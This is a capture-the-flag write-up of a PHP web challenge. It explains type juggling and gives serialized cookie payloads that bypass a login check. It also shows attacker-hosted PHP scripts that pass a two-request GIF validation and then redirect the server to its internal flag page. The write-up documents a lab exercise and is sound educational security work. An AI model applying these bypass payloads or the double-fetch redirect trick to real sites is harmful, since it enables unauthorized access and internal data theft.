EGCERT CTF 2019 - Priv8 Leecher

Abdulrhman Adel
Dec 8, 2019 · 3 min read

hello all,
Priv8 Leecher A web challenge from EGCTF 2019 Final round,
I managed to solve it with the help of my teammates Khaled Ibn Al-Walid, Ahmed Ezzat.

We were provided with the source code of the login.php file the source code was great until the comparison case since we control the type of password variable.

$login_data=unserialize(urldecode($_COOKIE['login_data']));$username=$login_data['username'];if($login_data['password']==$user['password']){$loggedin=1;}

we must bypass the login page with help of the source code

login.php

Root Cause

PHP has a feature called “type coercion” or “type juggling” This means that during the comparison of variables of different types, PHP will first convert them to a common, comparable type.

For example, when the program is comparing the string “7” and the integer 7 in the scenario below.

if (“7” == 7){echo 'type juggling';}

The code will output “type juggling” This is very helpful when you want your program to be flexible in dealing with different types of user input. and a major source of security vulnerabilities

For example, when PHP needs to compare the string “Password2” to the integer 2, PHP will attempt to extract the integer from the string. So this comparison will evaluate to True.

(“Password2” == 2) -> True

But what if the string that is being compared does not contain an integer? The string will then be converted to a “0”. So the following comparison will also evaluate to True:

(“Password” == 0) -> True

Solving

In the serialized object the password was a string but I can control the type of password variable. to be boolean or integer to bypass the comparison case

a:2:{s:8:"username";s:5:"admin";s:8:"password";b:1;}(True == "Password") will evaluate to -> Truea:2:{s:8:"username";s:5:"admin";s:8:"password";i:0;}(int(0) == "Password") will also evaluate to -> True

After changing the cookie, we have logged to Priv8 Leecher panel, in the index.php a function used to upload gif

I tried to fetch the flag file directly I got
“Error: Invalid GIF file!!”

I have set up a python listener in my server to check the request and I noticed that the server send 2 requests.

First request to check the mime-type if it's a valid gif the server will send second request to fetch the gif content

We have build PHP script to response with valid image in the first request and change the content of the file in the second request

<?php
$is_here = file_get_contents(“/var/www/html/test.txt”);
if ($is_here != “test”){
file_put_contents(“/var/www/html/test.txt”,”test”);
echo file_get_contents(“img.gif”);
}else {
echo "test";
}?>

after uploading the gif file the content was “test”

and finally, we got the flag by redirecting the second request to the flag file

<?php
$is_here = file_get_contents("/var/www/html/test.txt");
if ($is_here != "test"){
file_put_contents("/var/www/html/test.txt","test");
echo file_get_contents("img.gif");
}else {
header("location: http://127.0.0.1/priv8leecher/flag.php");
}
?>

./bye

Abdulrhman Adel

Written by

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade